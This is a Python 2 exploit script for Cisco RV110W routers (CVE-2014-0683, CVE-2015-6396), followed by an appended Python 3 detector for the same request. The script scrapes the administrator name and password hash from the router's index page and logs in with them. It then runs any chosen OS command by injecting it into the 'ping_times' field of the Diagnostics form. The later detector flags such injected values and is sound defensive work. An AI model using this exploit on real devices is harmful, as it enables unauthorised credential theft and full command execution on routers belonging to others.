[EXP]Cisco RV110W - Password Disclosure / Command Execution
#!/usr/bin/env python2

#####
## Cisco RV110W Password Disclosure and OS Command Execute.
### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
# Date: 2018-08
# Exploit Author: RySh
# Vendor Homepage: https://www.cisco.com/
# Version: 1.1.0.9
# Tested on: RV110W 1.1.0.9
# CVE : CVE-2014-0683, CVE-2015-6396

import os
import sys
import re
import urllib
import urllib2
import getopt
import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###
# Usage: ./{script_name} 192.168.1.1 443 "reboot"
###

if __name__ == "__main__":
    IP = sys.argv[1]
    PORT = sys.argv[2]
    CMD = sys.argv[3]

    # Get session key, Just access index page.
    url = 'https://' + IP + ':' + PORT + '/'
    req = urllib2.Request(url)
    result = urllib2.urlopen(req)
    res = result.read()

    # parse 'admin_pwd'! -- Get credits
    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

    # Get session_id by POST
    req2 = urllib2.Request(url + "login.cgi")
    req2.add_header('Origin', url)
    req2.add_header('Upgrade-Insecure-Requests', 1)
    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req2.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req2.add_header('Referer', url)
    req2.add_header('Accept-Encoding', 'gzip, deflate')
    req2.add_header('Accept-Language', 'en-US,en;q=0.9')
    req2.add_header('Cookie', 'SessionID=')
    data = {"submit_button": "login",
            "submit_type": "",
            "gui_action": "",
            "wait_time": "",
            "change_action": "",
            "enc": "",
            "user": admin_user,
            "pwd": admin_pwd,
            "sel_lang": "EN"
            }
    r = urllib2.urlopen(req2, urllib.urlencode(data))
    resp = r.read()
    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

    # Execute your commands via diagnose command parameter, default command is `reboot`
    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
    req3.add_header('Origin', url)
    req3.add_header('Upgrade-Insecure-Requests', 1)
    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req3.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req3.add_header('Referer', url)
    req3.add_header('Accept-Encoding', 'gzip, deflate')
    req3.add_header('Accept-Language', 'en-US,en;q=0.9')
    req3.add_header('Cookie', 'SessionID=')
    data_cmd = {"submit_button": "Diagnostics",
                "change_action": "gozila_cgi",
                "submit_type": "start_ping",
                "gui_action": "",
                "traceroute_ip": "",
                "commit": "",
                "ping_times": "3 |" + CMD + "|",
                "ping_size": "",
                "wait_time": "",
                "ping_ip": "127.0.0.1",
                "lookup_name": ""
                }
    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
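
A defender-side check for the Diagnostics request shown above, added here as an example and not part of the original exploit: it audits form-encoded POST bodies sent to apply.cgi and flags a `ping_times` or `ping_size` value that is not a plain integer, or a shell metacharacter in the host fields. It is written for Python 3; the function names, the metacharacter set and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Field names are the ones in the Diagnostics request on this page.
NUMERIC_FIELDS = ("ping_times", "ping_size")               # digits or empty
TEXT_FIELDS = ("ping_ip", "traceroute_ip", "lookup_name")  # host-like text
SHELL_META = re.compile(r"[|;&`$<>(){}\\'\"\r\n]")

# Constructed sample records (request path, form-encoded body), not captures.
SAMPLES = [
    ("/apply.cgi;session_id=PLACEHOLDER",
     "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping"
     "&ping_times=5&ping_size=64&ping_ip=192.168.1.10&lookup_name="),
    ("/apply.cgi;session_id=PLACEHOLDER",
     "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping"
     "&ping_times=3+%7CCMD%7C&ping_size=&ping_ip=127.0.0.1&lookup_name="),
]


def audit_diagnostics_body(body):
    """Return (field, value, reason) findings for one form-encoded POST body."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("submit_button", [""])[0] != "Diagnostics":
        return []
    findings = []
    # Check every occurrence, so a duplicated parameter cannot hide a bad value.
    for name in NUMERIC_FIELDS:
        for value in form.get(name, []):
            if not re.fullmatch(r"[0-9]*", value):
                findings.append((name, value, "not a plain integer"))
    for name in TEXT_FIELDS:
        for value in form.get(name, []):
            if SHELL_META.search(value):
                findings.append((name, value, "shell metacharacter"))
    return findings


def scan(records):
    """Audit only requests whose path targets apply.cgi."""
    hits = []
    for path, body in records:
        if path.split(";", 1)[0].endswith("/apply.cgi"):
            hits.extend(audit_diagnostics_body(body))
    return hits


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The same allow-list (digits only for the count and size fields) is the server-side validation whose absence lets the `ping_times` value reach a shell.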